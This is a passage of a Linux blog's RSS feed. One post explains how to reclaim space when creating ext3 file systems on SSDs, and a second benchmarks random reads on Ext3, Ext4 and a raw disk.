Reserved blocks uid:      0 (user root)<br />
Reserved blocks gid:      0 (group root)<br />
First inode:              11<br />
<strong>Inode size:               256</strong><br />
Required extra isize:     28<br />
Desired extra isize:      28<br />
Journal inode:            8<br />
Default directory hash:   half_md4<br />
Directory Hash Seed:      3ef6ca72-c800-4c44-8c77-532a21bcad5a<br />
Journal backup:           inode blocks<br />
Journal features:         (none)<br />
<strong>Journal size:             128M<br />
</strong>Journal length:           32768<br />
Journal sequence:         0×00000001<br />
Journal start:            0</p></blockquote>
<blockquote><p>Group 0: (Blocks 0-32767)<br />
Primary superblock at 0, Group descriptors at 1-5<br />
<strong>Reserved GDT blocks at 6-1024</strong><br />
Block bitmap at 1025 (+1025), Inode bitmap at 1026 (+1026)<br />
<strong>Inode table at 1027-1538 (+1027)</strong><br />
31223 free blocks, 8181 free inodes, 2 directories<br />
Free blocks: 1545-32767<br />
Free inodes: 12-8192</p>
<p>[snip ....]</p></blockquote>
<p>The file system block size is 4KB, which is different from the output block size of df and fdisk. In the above output, I mark the outlines with <strong>RED</strong> color. Now let’s look at the line for reserved block,</p>
<blockquote><p><strong>Reserved block count:     983178</strong></p></blockquote>
<p>These 983178 4K blocks are served for root user, since the system and user home is not on SSD, we don’t need to reserve these blocks.  Read mkfs.ext3(8), there is a parameter ‘-m’ to set reserved-blocks-percentage, set ‘-m 0′ to reserve zero block for privilege user.</p>
<p>From file system features line, we can see resize_inode is one of the default enabled feature,</p>
<blockquote><p>Filesystem features:      has_journal ext_attr <strong>resize_inode</strong> dir_index filetype needs_recovery sparse_super large_file</p></blockquote>
<p>resize_inode feature reserves quite a lot blocks for new extended block group descriptors, these blocks can be found from lines like,</p>
<blockquote><p><strong>Reserved GDT blocks at 6-1024</strong></p></blockquote>
<p>When resize_inode feature enabled, mkfs.ext3 will reserve some blocks after block group descriptor blocks, called “Reserved GDT blocks”.  If file system will be extended in future (e.g. the file system is created on a logical volume), these reserved blocks can be used for new block group descriptors. Now the storage media is SSD, not file system extension in future, we don’t have to pay money (on SSD, blocks means money) for this kind of blocks. To disable resize_inode feature, use “-O ^resize_inode” in mkfs.ext3(8).</p>
<p>Then look at these 2 lines for inode blocks,</p>
<blockquote><p><strong>Inodes per group:         8192<br />
Inode blocks per group:   512</strong></p></blockquote>
<p>We only store no more than 5 files on the whole file systems,  but here 512 blocks in each block groups are allocated for inode table. There are 601 block groups, which means 512×601=307712 blocks (≈ 1.2GB space) wasted for inode tables.  Using ‘-N 16′ in mkfs.ext3(8) to specify only 16 inodes in the file system, though mkfs.ext3(3) at least allocate one inode table block in each block group (more then 16 inodes), we only wast 1 block other than 512 blocks for inode able now.</p>
<blockquote><p><strong>Journal size:             128M<br />
</strong></p></blockquote>
<p>If most of the I/O are readings while writing performance is ignored, and people are really care about space usage, the journal area can be reduced to minimum size (1024 file system blocks), for 4KB blocks Ext3, it’s 4MB: -J size=4M</p>
<p>By above efforts, there is around 4GB+ space back to use. If you really care about the space usage efficiency of your SSD, how about making the file system with:</p>
<blockquote><p>mkfs.ext3 -J size=4M -m 0 -O ^resize_inode -I 16  &lt;device&gt;</p></blockquote>
<p>Then you have chance to get more data blocks into usage on your expensive SSD <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1081.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Random I/O — Is raw device always faster than file system ?</title>
		<link>http://www.enunix.com/1079.html</link>
		<comments>http://www.enunix.com/1079.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:24:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[device]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[io]]></category>
		<category><![CDATA[System]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1079</guid>
		<description><![CDATA[For some implementations of distributed file systems, like TFS [1], developers think storing data on raw device directly (e.g. /dev/sdb, /dev/sdc…) might be faster than on file systems. Their choice is reasonable, 1, Random I/O on large file cannot get &#8230; <a href="http://www.enunix.com/1079.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div>
<p>For some implementations of distributed file systems, like TFS [1], developers think storing data on raw device directly (e.g. /dev/sdb, /dev/sdc…) might be faster than on file systems.</p>
<p>Their choice is reasonable,</p>
<blockquote><p>1, Random I/O on large file cannot get any help from file system page cache.</p>
<p>2, &lt;logical offset, physical offset&gt; mapping introduces more I/O on file systems than on raw disk</p>
<p>3, Managing metadata on other powerful servers avoid the necessary to use file systems for data nodes.</p></blockquote>
<p>The penalty for the “higher” performance is management cost, storing data on raw device introduces difficulties like,</p>
<blockquote><p>1, Harder to backup/restore the data.</p>
<p>2, Cannot do more flexible management without special management tools for the raw device.</p>
<p>3, No convenient method to access/management the data on raw device.</p></blockquote>
<p>The above penalties are hard to be ignored by system administrators. Further more, the store of “higher” performance is not exactly true today,</p>
<blockquote><p>1, For file systems using block pointers for &lt;logical offset, physical offset&gt; mapping, large file takes too many pointer blocks. For example, on Ext3, with 4KB block, a 2TB file needs around 520K+  pointer blocks. Most of the pointer blocks are cold in random I/O, which results lower random I/O performance number than on raw device.</p>
<p>2, For file systems using extent for &lt;logical offset, physical offset&gt; mapping, the extent blocks number depends on how many fragment a large file has. For example, on Ext4, with max block group size 128MB, a 2TB file has around 16384 fragment. To mapping these 16K fragment, 16K extent records are needed, which can be placed in 50+ extent blocks. It’s very easy to hit a hot extent in memory for random I/O on large file.</p>
<p>3, If the &lt;logical offset, physical offset&gt; mapping can be cached in memory as hot, random I/O performance on file system might not be worse than on raw device.</p></blockquote>
<p>In order to verify my guess, I did some performance testing.  I share part of the data here.</p>
<blockquote><p>Processor: AMD opteron 6174 (2.2 GHz) x 2</p>
<p>Memory: DDR3 1333MHz 4GB x 4</p>
<p>Hard disk: 5400RPM SATA 2TB x 3 [2]</p>
<p>File size: (create by dd, almost) 2TB</p>
<p>Random I/O access: 100K times read</p>
<p>IO size: 512 bytes</p>
<p>File systems: Ext3, Ext4 (with and without directio)</p>
<p>test tool: <a href="http://www.mlxos.org/misc/seekrw.c" target="_blank">seekrw</a> [3]</p></blockquote>
<p>* With page cache</p>
<blockquote><p>- Command</p>
<p>seekrw -f /mnt/ext3/img -a 100000 -l 512 -r</p>
<p>seekrw -f /mnt/ext4/img -a 100000 -l 512 -r</p>
<p>- Performance result</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup>
<col width="64" />
<col width="75" />
<col width="72" />
<col width="86" />
<col width="86" />
<col width="86" />
<col width="86" /></colgroup>
<tbody>
<tr>
<td align="left" width="64" height="17"></td>
<td align="right" width="75">Device</td>
<td align="right" width="72">tps</td>
<td align="right" width="86">Blk_read/s</td>
<td align="right" width="86">Blk_wrtn/s</td>
<td align="right" width="86">Blk_read</td>
<td align="right" width="86">Blk_wrtn</td>
</tr>
<tr>
<td align="left" height="17">Ext3</td>
<td align="right">sdc</td>
<td align="right">95.88</td>
<td align="right">767.07</td>
<td align="right">0</td>
<td align="right">46024</td>
<td align="right">0</td>
</tr>
<tr>
<td align="left" height="17">Ext4</td>
<td align="right">sdd</td>
<td align="right">60.72</td>
<td align="right">485.6</td>
<td align="right">0</td>
<td align="right">29136</td>
<td align="right">0</td>
</tr>
</tbody>
</table>
<p>- Wall clock time</p>
<p>Ext3: real time: 34 minutes 23 seconds 557537 usec</p>
<p>Ext4: real time: 24 minutes 44 seconds 10118 usec</p></blockquote>
<p>* directio (without pagecache)</p>
<blockquote><p>- Command</p>
<p>seekrw -f /mnt/ext3/img -a 100000 -l 512 -r -d</p>
<p>seekrw -f /mnt/ext4/img -a 100000 -l 512 -r -d</p>
<p>- Performance result</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup>
<col width="64" />
<col width="75" />
<col width="72" />
<col width="86" />
<col width="86" />
<col width="86" />
<col width="86" /></colgroup>
<tbody>
<tr>
<td align="left" width="64" height="17"></td>
<td align="right" width="75">Device</td>
<td align="right" width="72">tps</td>
<td align="right" width="86">Blk_read/s</td>
<td align="right" width="86">Blk_wrtn/s</td>
<td align="right" width="86">Blk_read</td>
<td align="right" width="86">Blk_wrtn</td>
</tr>
<tr>
<td align="left" height="17">Ext3</td>
<td align="right">sdc</td>
<td align="right">94.93</td>
<td align="right">415.77</td>
<td align="right">0</td>
<td align="right">12473</td>
<td align="right">0</td>
</tr>
<tr>
<td align="left" height="17">Ext4</td>
<td align="right">sdd</td>
<td align="right">67.9</td>
<td align="right">67.9</td>
<td align="right">0</td>
<td align="right">2037</td>
<td align="right">0</td>
</tr>
<tr>
<td align="left" height="17">Raw</td>
<td align="right">sdf</td>
<td align="right">67.27</td>
<td align="right">538.13</td>
<td align="right">0</td>
<td align="right">16144</td>
<td align="right">0</td>
</tr>
</tbody>
</table>
<p>- Wall clock time</p>
<p>Ext3: real time: 33 minutes 26 seconds 947875 usec</p>
<p>Ext4: real time: 24 minutes 25 seconds 545536 usec</p>
<p>sdf: real time: 24 minutes 38 seconds 523379 usec    (raw device)</p></blockquote>
<p>From the above performance numbers, Ext4 is 39% faster than Ext3 on random I/O with or without paegcache, this is expected.</p>
<p>The result of random I/O on Ext4 and raw device, is almost same. This is a result also as expected. For file systems mapping &lt;logical offset, physical offset&gt; by extent, it’s quite easy to make most of the mapping records hot in memory. Random I/O on raw device has *NO* obvious performance advance then Ext4.</p>
<p>Dear developers, how about considering extent based file systems now <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
<p>—</p>
<p>[1] TFS, TaobaoFS. A distributed file system deployed for http://www.taobao.com . It is developed by core system team of Taobao, will be open source very soon.</p>
<p>[2] The hard disk is connected to RocketRAID 644 card via eSATA connecter into system.</p>
<p>[3] seekrw source code can be download from http://www.mlxos.org/misc/seekrw.c</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1079.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

